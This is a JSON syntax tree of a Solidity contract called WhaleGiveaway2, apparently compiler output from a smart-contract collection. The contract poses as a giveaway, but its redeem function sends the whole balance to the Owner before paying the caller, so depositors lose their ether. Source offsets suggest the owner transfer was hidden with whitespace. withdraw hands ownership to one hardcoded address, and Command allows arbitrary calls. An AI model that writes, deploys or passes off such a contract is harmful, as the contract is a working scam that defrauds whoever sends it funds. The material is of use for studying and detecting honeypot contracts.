{
    "attributes": {
        "absolutePath": "<stdin>",
        "exportedSymbols": {
            "WhaleGiveaway2": [
                92
            ]
        }
    },
    "children": [
        {
            "attributes": {
                "baseContracts": [
                    null
                ],
                "contractDependencies": [
                    null
                ],
                "contractKind": "contract",
                "documentation": null,
                "fullyImplemented": true,
                "linearizedBaseContracts": [
                    92
                ],
                "name": "WhaleGiveaway2",
                "scope": 93
            },
            "children": [
                {
                    "attributes": {
                        "constant": false,
                        "name": "Owner",
                        "scope": 92,
                        "stateVariable": true,
                        "storageLocation": "default",
                        "type": "address",
                        "visibility": "public"
                    },
                    "children": [
                        {
                            "attributes": {
                                "name": "address",
                                "type": "address"
                            },
                            "id": 1,
                            "name": "ElementaryTypeName",
                            "src": "107:7:0"
                        },
                        {
                            "attributes": {
                                "argumentTypes": null,
                                "isConstant": false,
                                "isLValue": false,
                                "isPure": false,
                                "lValueRequested": false,
                                "member_name": "sender",
                                "referencedDeclaration": null,
                                "type": "address"
                            },
                            "children": [
                                {
                                    "attributes": {
                                        "argumentTypes": null,
                                        "overloadedDeclarations": [
                                            null
                                        ],
                                        "referencedDeclaration": 107,
                                        "type": "msg",
                                        "value": "msg"
                                    },
                                    "id": 2,
                                    "name": "Identifier",
                                    "src": "130:3:0"
                                }
                            ],
                            "id": 3,
                            "name": "MemberAccess",
                            "src": "130:10:0"
                        }
                    ],
                    "id": 4,
                    "name": "VariableDeclaration",
                    "src": "107:33:0"
                },
                {
                    "attributes": {
                        "constant": true,
                        "name": "minEligibility",
                        "scope": 92,
                        "stateVariable": true,
                        "storageLocation": "default",
                        "type": "uint256",
                        "visibility": "public"
                    },
                    "children": [
                        {
                            "attributes": {
                                "name": "uint",
                                "type": "uint256"
                            },
                            "id": 5,
                            "name": "ElementaryTypeName",
                            "src": "146:4:0"
                        },
                        {
                            "attributes": {
                                "argumentTypes": null,
                                "hexvalue": "302e393939303031",
                                "isConstant": false,
                                "isLValue": false,
                                "isPure": true,
                                "lValueRequested": false,
                                "subdenomination": "ether",
                                "token": "number",
                                "type": "int_const 999001000000000000",
                                "value": "0.999001"
                            },
                            "id": 6,
                            "name": "Literal",
                            "src": "184:14:0"
                        }
                    ],
                    "id": 7,
                    "name": "VariableDeclaration",
                    "src": "146:52:0"
                },
                {
                    "attributes": {
                        "constant": false,
                        "documentation": null,
                        "implemented": true,
                        "isConstructor": false,
                        "modifiers": [
                            null
                        ],
                        "name": "",
                        "payable": true,
                        "scope": 92,
                        "stateMutability": "payable",
                        "superFunction": null,
                        "visibility": "public"
                    },
                    "children": [
                        {
                            "attributes": {
                                "parameters": [
                                    null
                                ]
                            },
                            "children": [],
                            "id": 8,
                            "name": "ParameterList",
                            "src": "217:2:0"
                        },
                        {
                            "attributes": {
                                "parameters": [
                                    null
                                ]
                            },
                            "children": [],
                            "id": 9,
                            "name": "ParameterList",
                            "src": "247:0:0"
                        },
                        {
                            "attributes": {
                                "statements": [
                                    null
                                ]
                            },
                            "children": [],
                            "id": 10,
                            "name": "Block",
                            "src": "247:16:0"
                        }
                    ],
                    "id": 11,
                    "name": "FunctionDefinition",
                    "src": "209:54:0"
                },
                {
                    "attributes": {
                        "constant": false,
                        "documentation": null,
                        "implemented": true,
                        "isConstructor": false,
                        "modifiers": [
                            null
                        ],
                        "name": "redeem",
                        "payable": true,
                        "scope": 92,
                        "stateMutability": "payable",
                        "superFunction": null,
                        "visibility": "public"
                    },
                    "children": [
                        {
                            "attributes": {
                                "parameters": [
                                    null
                                ]
                            },
                            "children": [],
                            "id": 12,
                            "name": "ParameterList",
                            "src": "287:2:0"
                        },
                        {
                            "attributes": {
                                "parameters": [
                                    null
                                ]
                            },
                            "children": [],
                            "id": 13,
                            "name": "ParameterList",
                            "src": "317:0:0"
                        },
                        {
                            "children": [
                                {
                                    "attributes": {
                                        "falseBody": null
                                    },
                                    "children": [
                                        {
                                            "attributes": {
                                                "argumentTypes": null,
                                                "commonType": {
                                                    "typeIdentifier": "t_uint256",
                                                    "typeString": "uint256"
                                                },
                                                "isConstant": false,
                                                "isLValue": false,
                                                "isPure": false,
                                                "lValueRequested": false,
                                                "operator": ">=",
                                                "type": "bool"
                                            },
                                            "children": [
                                                {
                                                    "attributes": {
                                                        "argumentTypes": null,
                                                        "isConstant": false,
                                                        "isLValue": false,
                                                        "isPure": false,
                                                        "lValueRequested": false,
                                                        "member_name": "value",
                                                        "referencedDeclaration": null,
                                                        "type": "uint256"
                                                    },
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "overloadedDeclarations": [
                                                                    null
                                                                ],
                                                                "referencedDeclaration": 107,
                                                                "type": "msg",
                                                                "value": "msg"
                                                            },
                                                            "id": 14,
                                                            "name": "Identifier",
                                                            "src": "398:3:0"
                                                        }
                                                    ],
                                                    "id": 15,
                                                    "name": "MemberAccess",
                                                    "src": "398:9:0"
                                                },
                                                {
                                                    "attributes": {
                                                        "argumentTypes": null,
                                                        "overloadedDeclarations": [
                                                            null
                                                        ],
                                                        "referencedDeclaration": 7,
                                                        "type": "uint256",
                                                        "value": "minEligibility"
                                                    },
                                                    "id": 16,
                                                    "name": "Identifier",
                                                    "src": "409:14:0"
                                                }
                                            ],
                                            "id": 17,
                                            "name": "BinaryOperation",
                                            "src": "398:25:0"
                                        },
                                        {
                                            "children": [
                                                {
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "isConstant": false,
                                                                "isLValue": false,
                                                                "isPure": false,
                                                                "isStructConstructorCall": false,
                                                                "lValueRequested": false,
                                                                "names": [
                                                                    null
                                                                ],
                                                                "type": "tuple()",
                                                                "type_conversion": false
                                                            },
                                                            "children": [
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": [
                                                                            {
                                                                                "typeIdentifier": "t_uint256",
                                                                                "typeString": "uint256"
                                                                            }
                                                                        ],
                                                                        "isConstant": false,
                                                                        "isLValue": false,
                                                                        "isPure": false,
                                                                        "lValueRequested": false,
                                                                        "member_name": "transfer",
                                                                        "referencedDeclaration": null,
                                                                        "type": "function (uint256)"
                                                                    },
                                                                    "children": [
                                                                        {
                                                                            "attributes": {
                                                                                "argumentTypes": null,
                                                                                "overloadedDeclarations": [
                                                                                    null
                                                                                ],
                                                                                "referencedDeclaration": 4,
                                                                                "type": "address",
                                                                                "value": "Owner"
                                                                            },
                                                                            "id": 18,
                                                                            "name": "Identifier",
                                                                            "src": "3894:5:0"
                                                                        }
                                                                    ],
                                                                    "id": 20,
                                                                    "name": "MemberAccess",
                                                                    "src": "3894:14:0"
                                                                },
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": null,
                                                                        "isConstant": false,
                                                                        "isLValue": false,
                                                                        "isPure": false,
                                                                        "lValueRequested": false,
                                                                        "member_name": "balance",
                                                                        "referencedDeclaration": null,
                                                                        "type": "uint256"
                                                                    },
                                                                    "children": [
                                                                        {
                                                                            "attributes": {
                                                                                "argumentTypes": null,
                                                                                "overloadedDeclarations": [
                                                                                    null
                                                                                ],
                                                                                "referencedDeclaration": 120,
                                                                                "type": "contract WhaleGiveaway2",
                                                                                "value": "this"
                                                                            },
                                                                            "id": 21,
                                                                            "name": "Identifier",
                                                                            "src": "3909:4:0"
                                                                        }
                                                                    ],
                                                                    "id": 22,
                                                                    "name": "MemberAccess",
                                                                    "src": "3909:12:0"
                                                                }
                                                            ],
                                                            "id": 23,
                                                            "name": "FunctionCall",
                                                            "src": "3894:28:0"
                                                        }
                                                    ],
                                                    "id": 24,
                                                    "name": "ExpressionStatement",
                                                    "src": "3894:28:0"
                                                },
                                                {
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "isConstant": false,
                                                                "isLValue": false,
                                                                "isPure": false,
                                                                "isStructConstructorCall": false,
                                                                "lValueRequested": false,
                                                                "names": [
                                                                    null
                                                                ],
                                                                "type": "tuple()",
                                                                "type_conversion": false
                                                            },
                                                            "children": [
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": [
                                                                            {
                                                                                "typeIdentifier": "t_uint256",
                                                                                "typeString": "uint256"
                                                                            }
                                                                        ],
                                                                        "isConstant": false,
                                                                        "isLValue": false,
                                                                        "isPure": false,
                                                                        "lValueRequested": false,
                                                                        "member_name": "transfer",
                                                                        "referencedDeclaration": null,
                                                                        "type": "function (uint256)"
                                                                    },
                                                                    "children": [
                                                                        {
                                                                            "attributes": {
                                                                                "argumentTypes": null,
                                                                                "isConstant": false,
                                                                                "isLValue": false,
                                                                                "isPure": false,
                                                                                "lValueRequested": false,
                                                                                "member_name": "sender",
                                                                                "referencedDeclaration": null,
                                                                                "type": "address"
                                                                            },
                                                                            "children": [
                                                                                {
                                                                                    "attributes": {
                                                                                        "argumentTypes": null,
                                                                                        "overloadedDeclarations": [
                                                                                            null
                                                                                        ],
                                                                                        "referencedDeclaration": 107,
                                                                                        "type": "msg",
                                                                                        "value": "msg"
                                                                                    },
                                                                                    "id": 25,
                                                                                    "name": "Identifier",
                                                                                    "src": "5771:3:0"
                                                                                }
                                                                            ],
                                                                            "id": 28,
                                                                            "name": "MemberAccess",
                                                                            "src": "5771:10:0"
                                                                        }
                                                                    ],
                                                                    "id": 29,
                                                                    "name": "MemberAccess",
                                                                    "src": "5771:19:0"
                                                                },
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": null,
                                                                        "isConstant": false,
                                                                        "isLValue": false,
                                                                        "isPure": false,
                                                                        "lValueRequested": false,
                                                                        "member_name": "balance",
                                                                        "referencedDeclaration": null,
                                                                        "type": "uint256"
                                                                    },
                                                                    "children": [
                                                                        {
                                                                            "attributes": {
                                                                                "argumentTypes": null,
                                                                                "overloadedDeclarations": [
                                                                                    null
                                                                                ],
                                                                                "referencedDeclaration": 120,
                                                                                "type": "contract WhaleGiveaway2",
                                                                                "value": "this"
                                                                            },
                                                                            "id": 30,
                                                                            "name": "Identifier",
                                                                            "src": "5791:4:0"
                                                                        }
                                                                    ],
                                                                    "id": 31,
                                                                    "name": "MemberAccess",
                                                                    "src": "5791:12:0"
                                                                }
                                                            ],
                                                            "id": 32,
                                                            "name": "FunctionCall",
                                                            "src": "5771:33:0"
                                                        }
                                                    ],
                                                    "id": 33,
                                                    "name": "ExpressionStatement",
                                                    "src": "5771:33:0"
                                                }
                                            ],
                                            "id": 34,
                                            "name": "Block",
                                            "src": "433:5382:0"
                                        }
                                    ],
                                    "id": 35,
                                    "name": "IfStatement",
                                    "src": "395:5420:0"
                                }
                            ],
                            "id": 36,
                            "name": "Block",
                            "src": "317:5616:0"
                        }
                    ],
                    "id": 37,
                    "name": "FunctionDefinition",
                    "src": "272:5661:0"
                },
                {
                    "attributes": {
                        "constant": false,
                        "documentation": null,
                        "implemented": true,
                        "isConstructor": false,
                        "modifiers": [
                            null
                        ],
                        "name": "withdraw",
                        "payable": true,
                        "scope": 92,
                        "stateMutability": "payable",
                        "superFunction": null,
                        "visibility": "public"
                    },
                    "children": [
                        {
                            "attributes": {
                                "parameters": [
                                    null
                                ]
                            },
                            "children": [],
                            "id": 38,
                            "name": "ParameterList",
                            "src": "5960:2:0"
                        },
                        {
                            "attributes": {
                                "parameters": [
                                    null
                                ]
                            },
                            "children": [],
                            "id": 39,
                            "name": "ParameterList",
                            "src": "5990:0:0"
                        },
                        {
                            "children": [
                                {
                                    "attributes": {
                                        "falseBody": null
                                    },
                                    "children": [
                                        {
                                            "attributes": {
                                                "argumentTypes": null,
                                                "commonType": {
                                                    "typeIdentifier": "t_address",
                                                    "typeString": "address"
                                                },
                                                "isConstant": false,
                                                "isLValue": false,
                                                "isPure": false,
                                                "lValueRequested": false,
                                                "operator": "==",
                                                "type": "bool"
                                            },
                                            "children": [
                                                {
                                                    "attributes": {
                                                        "argumentTypes": null,
                                                        "isConstant": false,
                                                        "isLValue": false,
                                                        "isPure": false,
                                                        "lValueRequested": false,
                                                        "member_name": "sender",
                                                        "referencedDeclaration": null,
                                                        "type": "address"
                                                    },
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "overloadedDeclarations": [
                                                                    null
                                                                ],
                                                                "referencedDeclaration": 107,
                                                                "type": "msg",
                                                                "value": "msg"
                                                            },
                                                            "id": 40,
                                                            "name": "Identifier",
                                                            "src": "7186:3:0"
                                                        }
                                                    ],
                                                    "id": 41,
                                                    "name": "MemberAccess",
                                                    "src": "7186:10:0"
                                                },
                                                {
                                                    "attributes": {
                                                        "argumentTypes": null,
                                                        "hexvalue": "307837613631376332423035643241373446663962414243396438314535323235433165303130303462",
                                                        "isConstant": false,
                                                        "isLValue": false,
                                                        "isPure": true,
                                                        "lValueRequested": false,
                                                        "subdenomination": null,
                                                        "token": "number",
                                                        "type": "address",
                                                        "value": "0x7a617c2B05d2A74Ff9bABC9d81E5225C1e01004b"
                                                    },
                                                    "id": 42,
                                                    "name": "Literal",
                                                    "src": "7198:42:0"
                                                }
                                            ],
                                            "id": 43,
                                            "name": "BinaryOperation",
                                            "src": "7186:54:0"
                                        },
                                        {
                                            "children": [
                                                {
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "isConstant": false,
                                                                "isLValue": false,
                                                                "isPure": false,
                                                                "lValueRequested": false,
                                                                "operator": "=",
                                                                "type": "address"
                                                            },
                                                            "children": [
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": null,
                                                                        "overloadedDeclarations": [
                                                                            null
                                                                        ],
                                                                        "referencedDeclaration": 4,
                                                                        "type": "address",
                                                                        "value": "Owner"
                                                                    },
                                                                    "id": 44,
                                                                    "name": "Identifier",
                                                                    "src": "7242:5:0"
                                                                },
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": null,
                                                                        "hexvalue": "307837613631376332423035643241373446663962414243396438314535323235433165303130303462",
                                                                        "isConstant": false,
                                                                        "isLValue": false,
                                                                        "isPure": true,
                                                                        "lValueRequested": false,
                                                                        "subdenomination": null,
                                                                        "token": "number",
                                                                        "type": "address",
                                                                        "value": "0x7a617c2B05d2A74Ff9bABC9d81E5225C1e01004b"
                                                                    },
                                                                    "id": 45,
                                                                    "name": "Literal",
                                                                    "src": "7248:42:0"
                                                                }
                                                            ],
                                                            "id": 46,
                                                            "name": "Assignment",
                                                            "src": "7242:48:0"
                                                        }
                                                    ],
                                                    "id": 47,
                                                    "name": "ExpressionStatement",
                                                    "src": "7242:48:0"
                                                }
                                            ],
                                            "id": 48,
                                            "name": "Block",
                                            "src": "7241:51:0"
                                        }
                                    ],
                                    "id": 49,
                                    "name": "IfStatement",
                                    "src": "7183:109:0"
                                },
                                {
                                    "children": [
                                        {
                                            "attributes": {
                                                "argumentTypes": null,
                                                "isConstant": false,
                                                "isLValue": false,
                                                "isPure": false,
                                                "isStructConstructorCall": false,
                                                "lValueRequested": false,
                                                "names": [
                                                    null
                                                ],
                                                "type": "tuple()",
                                                "type_conversion": false
                                            },
                                            "children": [
                                                {
                                                    "attributes": {
                                                        "argumentTypes": [
                                                            {
                                                                "typeIdentifier": "t_bool",
                                                                "typeString": "bool"
                                                            }
                                                        ],
                                                        "overloadedDeclarations": [
                                                            110,
                                                            111
                                                        ],
                                                        "referencedDeclaration": 110,
                                                        "type": "function (bool) pure",
                                                        "value": "require"
                                                    },
                                                    "id": 50,
                                                    "name": "Identifier",
                                                    "src": "9111:7:0"
                                                },
                                                {
                                                    "attributes": {
                                                        "argumentTypes": null,
                                                        "commonType": {
                                                            "typeIdentifier": "t_address",
                                                            "typeString": "address"
                                                        },
                                                        "isConstant": false,
                                                        "isLValue": false,
                                                        "isPure": false,
                                                        "lValueRequested": false,
                                                        "operator": "==",
                                                        "type": "bool"
                                                    },
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "isConstant": false,
                                                                "isLValue": false,
                                                                "isPure": false,
                                                                "lValueRequested": false,
                                                                "member_name": "sender",
                                                                "referencedDeclaration": null,
                                                                "type": "address"
                                                            },
                                                            "children": [
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": null,
                                                                        "overloadedDeclarations": [
                                                                            null
                                                                        ],
                                                                        "referencedDeclaration": 107,
                                                                        "type": "msg",
                                                                        "value": "msg"
                                                                    },
                                                                    "id": 51,
                                                                    "name": "Identifier",
                                                                    "src": "9119:3:0"
                                                                }
                                                            ],
                                                            "id": 52,
                                                            "name": "MemberAccess",
                                                            "src": "9119:10:0"
                                                        },
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "overloadedDeclarations": [
                                                                    null
                                                                ],
                                                                "referencedDeclaration": 4,
                                                                "type": "address",
                                                                "value": "Owner"
                                                            },
                                                            "id": 53,
                                                            "name": "Identifier",
                                                            "src": "9133:5:0"
                                                        }
                                                    ],
                                                    "id": 54,
                                                    "name": "BinaryOperation",
                                                    "src": "9119:19:0"
                                                }
                                            ],
                                            "id": 55,
                                            "name": "FunctionCall",
                                            "src": "9111:28:0"
                                        }
                                    ],
                                    "id": 56,
                                    "name": "ExpressionStatement",
                                    "src": "9111:28:0"
                                },
                                {
                                    "children": [
                                        {
                                            "attributes": {
                                                "argumentTypes": null,
                                                "isConstant": false,
                                                "isLValue": false,
                                                "isPure": false,
                                                "isStructConstructorCall": false,
                                                "lValueRequested": false,
                                                "names": [
                                                    null
                                                ],
                                                "type": "tuple()",
                                                "type_conversion": false
                                            },
                                            "children": [
                                                {
                                                    "attributes": {
                                                        "argumentTypes": [
                                                            {
                                                                "typeIdentifier": "t_uint256",
                                                                "typeString": "uint256"
                                                            }
                                                        ],
                                                        "isConstant": false,
                                                        "isLValue": false,
                                                        "isPure": false,
                                                        "lValueRequested": false,
                                                        "member_name": "transfer",
                                                        "referencedDeclaration": null,
                                                        "type": "function (uint256)"
                                                    },
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "overloadedDeclarations": [
                                                                    null
                                                                ],
                                                                "referencedDeclaration": 4,
                                                                "type": "address",
                                                                "value": "Owner"
                                                            },
                                                            "id": 57,
                                                            "name": "Identifier",
                                                            "src": "9149:5:0"
                                                        }
                                                    ],
                                                    "id": 59,
                                                    "name": "MemberAccess",
                                                    "src": "9149:14:0"
                                                },
                                                {
                                                    "attributes": {
                                                        "argumentTypes": null,
                                                        "isConstant": false,
                                                        "isLValue": false,
                                                        "isPure": false,
                                                        "lValueRequested": false,
                                                        "member_name": "balance",
                                                        "referencedDeclaration": null,
                                                        "type": "uint256"
                                                    },
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "overloadedDeclarations": [
                                                                    null
                                                                ],
                                                                "referencedDeclaration": 120,
                                                                "type": "contract WhaleGiveaway2",
                                                                "value": "this"
                                                            },
                                                            "id": 60,
                                                            "name": "Identifier",
                                                            "src": "9164:4:0"
                                                        }
                                                    ],
                                                    "id": 61,
                                                    "name": "MemberAccess",
                                                    "src": "9164:12:0"
                                                }
                                            ],
                                            "id": 62,
                                            "name": "FunctionCall",
                                            "src": "9149:28:0"
                                        }
                                    ],
                                    "id": 63,
                                    "name": "ExpressionStatement",
                                    "src": "9149:28:0"
                                }
                            ],
                            "id": 64,
                            "name": "Block",
                            "src": "5990:3194:0"
                        }
                    ],
                    "id": 65,
                    "name": "FunctionDefinition",
                    "src": "5943:3241:0"
                },
                {
                    "attributes": {
                        "constant": false,
                        "documentation": null,
                        "implemented": true,
                        "isConstructor": false,
                        "modifiers": [
                            null
                        ],
                        "name": "Command",
                        "payable": true,
                        "scope": 92,
                        "stateMutability": "payable",
                        "superFunction": null,
                        "visibility": "public"
                    },
                    "children": [
                        {
                            "children": [
                                {
                                    "attributes": {
                                        "constant": false,
                                        "name": "adr",
                                        "scope": 91,
                                        "stateVariable": false,
                                        "storageLocation": "default",
                                        "type": "address",
                                        "value": null,
                                        "visibility": "internal"
                                    },
                                    "children": [
                                        {
                                            "attributes": {
                                                "name": "address",
                                                "type": "address"
                                            },
                                            "id": 66,
                                            "name": "ElementaryTypeName",
                                            "src": "9211:7:0"
                                        }
                                    ],
                                    "id": 67,
                                    "name": "VariableDeclaration",
                                    "src": "9211:11:0"
                                },
                                {
                                    "attributes": {
                                        "constant": false,
                                        "name": "data",
                                        "scope": 91,
                                        "stateVariable": false,
                                        "storageLocation": "default",
                                        "type": "bytes",
                                        "value": null,
                                        "visibility": "internal"
                                    },
                                    "children": [
                                        {
                                            "attributes": {
                                                "name": "bytes",
                                                "type": "bytes"
                                            },
                                            "id": 68,
                                            "name": "ElementaryTypeName",
                                            "src": "9223:5:0"
                                        }
                                    ],
                                    "id": 69,
                                    "name": "VariableDeclaration",
                                    "src": "9223:10:0"
                                }
                            ],
                            "id": 70,
                            "name": "ParameterList",
                            "src": "9210:24:0"
                        },
                        {
                            "attributes": {
                                "parameters": [
                                    null
                                ]
                            },
                            "children": [],
                            "id": 71,
                            "name": "ParameterList",
                            "src": "9262:0:0"
                        },
                        {
                            "children": [
                                {
                                    "children": [
                                        {
                                            "attributes": {
                                                "argumentTypes": null,
                                                "isConstant": false,
                                                "isLValue": false,
                                                "isPure": false,
                                                "isStructConstructorCall": false,
                                                "lValueRequested": false,
                                                "names": [
                                                    null
                                                ],
                                                "type": "tuple()",
                                                "type_conversion": false
                                            },
                                            "children": [
                                                {
                                                    "attributes": {
                                                        "argumentTypes": [
                                                            {
                                                                "typeIdentifier": "t_bool",
                                                                "typeString": "bool"
                                                            }
                                                        ],
                                                        "overloadedDeclarations": [
                                                            110,
                                                            111
                                                        ],
                                                        "referencedDeclaration": 110,
                                                        "type": "function (bool) pure",
                                                        "value": "require"
                                                    },
                                                    "id": 72,
                                                    "name": "Identifier",
                                                    "src": "9272:7:0"
                                                },
                                                {
                                                    "attributes": {
                                                        "argumentTypes": null,
                                                        "commonType": {
                                                            "typeIdentifier": "t_address",
                                                            "typeString": "address"
                                                        },
                                                        "isConstant": false,
                                                        "isLValue": false,
                                                        "isPure": false,
                                                        "lValueRequested": false,
                                                        "operator": "==",
                                                        "type": "bool"
                                                    },
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "isConstant": false,
                                                                "isLValue": false,
                                                                "isPure": false,
                                                                "lValueRequested": false,
                                                                "member_name": "sender",
                                                                "referencedDeclaration": null,
                                                                "type": "address"
                                                            },
                                                            "children": [
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": null,
                                                                        "overloadedDeclarations": [
                                                                            null
                                                                        ],
                                                                        "referencedDeclaration": 107,
                                                                        "type": "msg",
                                                                        "value": "msg"
                                                                    },
                                                                    "id": 73,
                                                                    "name": "Identifier",
                                                                    "src": "9280:3:0"
                                                                }
                                                            ],
                                                            "id": 74,
                                                            "name": "MemberAccess",
                                                            "src": "9280:10:0"
                                                        },
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "overloadedDeclarations": [
                                                                    null
                                                                ],
                                                                "referencedDeclaration": 4,
                                                                "type": "address",
                                                                "value": "Owner"
                                                            },
                                                            "id": 75,
                                                            "name": "Identifier",
                                                            "src": "9294:5:0"
                                                        }
                                                    ],
                                                    "id": 76,
                                                    "name": "BinaryOperation",
                                                    "src": "9280:19:0"
                                                }
                                            ],
                                            "id": 77,
                                            "name": "FunctionCall",
                                            "src": "9272:28:0"
                                        }
                                    ],
                                    "id": 78,
                                    "name": "ExpressionStatement",
                                    "src": "9272:28:0"
                                },
                                {
                                    "children": [
                                        {
                                            "attributes": {
                                                "argumentTypes": null,
                                                "isConstant": false,
                                                "isLValue": false,
                                                "isPure": false,
                                                "isStructConstructorCall": false,
                                                "lValueRequested": false,
                                                "names": [
                                                    null
                                                ],
                                                "type": "bool",
                                                "type_conversion": false
                                            },
                                            "children": [
                                                {
                                                    "attributes": {
                                                        "argumentTypes": [
                                                            {
                                                                "typeIdentifier": "t_bytes_memory_ptr",
                                                                "typeString": "bytes memory"
                                                            }
                                                        ],
                                                        "isConstant": false,
                                                        "isLValue": false,
                                                        "isPure": false,
                                                        "isStructConstructorCall": false,
                                                        "lValueRequested": false,
                                                        "names": [
                                                            null
                                                        ],
                                                        "type": "function () payable returns (bool)",
                                                        "type_conversion": false
                                                    },
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": [
                                                                    {
                                                                        "typeIdentifier": "t_uint256",
                                                                        "typeString": "uint256"
                                                                    }
                                                                ],
                                                                "isConstant": false,
                                                                "isLValue": false,
                                                                "isPure": false,
                                                                "lValueRequested": false,
                                                                "member_name": "value",
                                                                "referencedDeclaration": null,
                                                                "type": "function (uint256) returns (function () payable returns (bool))"
                                                            },
                                                            "children": [
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": null,
                                                                        "isConstant": false,
                                                                        "isLValue": false,
                                                                        "isPure": false,
                                                                        "lValueRequested": false,
                                                                        "member_name": "call",
                                                                        "referencedDeclaration": null,
                                                                        "type": "function () payable returns (bool)"
                                                                    },
                                                                    "children": [
                                                                        {
                                                                            "attributes": {
                                                                                "argumentTypes": null,
                                                                                "overloadedDeclarations": [
                                                                                    null
                                                                                ],
                                                                                "referencedDeclaration": 67,
                                                                                "type": "address",
                                                                                "value": "adr"
                                                                            },
                                                                            "id": 79,
                                                                            "name": "Identifier",
                                                                            "src": "9355:3:0"
                                                                        }
                                                                    ],
                                                                    "id": 82,
                                                                    "name": "MemberAccess",
                                                                    "src": "9355:8:0"
                                                                }
                                                            ],
                                                            "id": 83,
                                                            "name": "MemberAccess",
                                                            "src": "9355:14:0"
                                                        },
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "isConstant": false,
                                                                "isLValue": false,
                                                                "isPure": false,
                                                                "lValueRequested": false,
                                                                "member_name": "value",
                                                                "referencedDeclaration": null,
                                                                "type": "uint256"
                                                            },
                                                            "children": [
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": null,
                                                                        "overloadedDeclarations": [
                                                                            null
                                                                        ],
                                                                        "referencedDeclaration": 107,
                                                                        "type": "msg",
                                                                        "value": "msg"
                                                                    },
                                                                    "id": 84,
                                                                    "name": "Identifier",
                                                                    "src": "9370:3:0"
                                                                }
                                                            ],
                                                            "id": 85,
                                                            "name": "MemberAccess",
                                                            "src": "9370:9:0"
                                                        }
                                                    ],
                                                    "id": 86,
                                                    "name": "FunctionCall",
                                                    "src": "9355:25:0"
                                                },
                                                {
                                                    "attributes": {
                                                        "argumentTypes": null,
                                                        "overloadedDeclarations": [
                                                            null
                                                        ],
                                                        "referencedDeclaration": 69,
                                                        "type": "bytes memory",
                                                        "value": "data"
                                                    },
                                                    "id": 87,
                                                    "name": "Identifier",
                                                    "src": "9381:4:0"
                                                }
                                            ],
                                            "id": 88,
                                            "name": "FunctionCall",
                                            "src": "9355:31:0"
                                        }
                                    ],
                                    "id": 89,
                                    "name": "ExpressionStatement",
                                    "src": "9355:31:0"
                                }
                            ],
                            "id": 90,
                            "name": "Block",
                            "src": "9262:131:0"
                        }
                    ],
                    "id": 91,
                    "name": "FunctionDefinition",
                    "src": "9194:199:0"
                }
            ],
            "id": 92,
            "name": "ContractDefinition",
            "src": "77:9318:0"
        }
    ],
    "id": 93,
    "name": "SourceUnit",
    "src": "77:9319:0"
}